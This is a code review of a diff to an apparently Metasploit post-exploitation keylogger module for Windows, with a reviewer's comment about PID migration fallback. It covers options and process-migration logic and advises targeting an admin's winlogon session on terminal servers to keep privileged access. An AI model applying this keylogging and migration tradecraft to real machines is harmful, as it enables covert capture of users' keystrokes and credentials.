modules/post/windows/capture/keylog_recorder.rb

```diff
@@ -34,49 +35,74 @@ def initialize(info={})
       [
         OptBool.new('LOCKSCREEN',   [false, 'Lock system screen.', false]),
         OptBool.new('MIGRATE',      [false, 'Perform Migration.', false]),
-        OptInt.new( 'INTERVAL',     [false, 'Time interval to save keystrokes', 5]),
+        OptInt.new( 'INTERVAL',     [false, 'Time interval to save keystrokes in seconds', 5]),
         OptInt.new( 'PID',          [false, 'Process ID to migrate to', nil]),
         OptEnum.new('CAPTURE_TYPE', [false, 'Capture keystrokes for Explorer, Winlogon or PID',
                 'explorer', ['explorer','winlogon','pid']])
 
       ], self.class)
     register_advanced_options(
       [
-        OptBool.new('ShowKeystrokes',   [false, 'Show captured keystrokes', false])
+        OptBool.new('ShowKeystrokes',   [false, 'Show captured keystrokes', false]),
+        OptEnum.new('TimeOutAction', [true, 'Action to take when session response timeout occurs.',
+                'wait', ['wait','exit']])
       ], self.class)
   end
 
-  # Run Method for when run command is issued
   def run
-
     print_status("Executing module against #{sysinfo['Computer']}")
     if datastore['MIGRATE']
-      case datastore['CAPTURE_TYPE']
-      when "explorer"
-        process_migrate(datastore['CAPTURE_TYPE'],datastore['LOCKSCREEN'])
-      when "winlogon"
-        process_migrate(datastore['CAPTURE_TYPE'],datastore['LOCKSCREEN'])
-      when "pid"
-        if datastore['PID'] and has_pid?(datastore['PID'])
-          pid_migrate(datastore['PID'])
-        else
-          print_error("If capture type is pid you must provide a valid one")
-          return
+      if datastore['CAPTURE_TYPE'] == "pid"
+        if !migrate_pid(datastore['PID'], session.sys.process.getpid)
+          print_error("Unable to migrate to given PID. Using Explorer instead.")
```

Comment:
Please do not automatically fall back to explorer migration if PID migration fails. There are many instances in which you may have a privileged shell and want to migrate to a privileged desktop process to do key recording, so you specify its PID. For example, on terminal servers, you'll have many winlogon.exe processes, one for each session. You may want to specify a particular one that an admin is connected to by PID. If that fails, the module should not migrate into explorer instead; otherwise you will have lost your privileged access when you have not instructed the module to do so. Anything that can lose valuable privileged access like that should not happen without being specified by the user or clear from the options.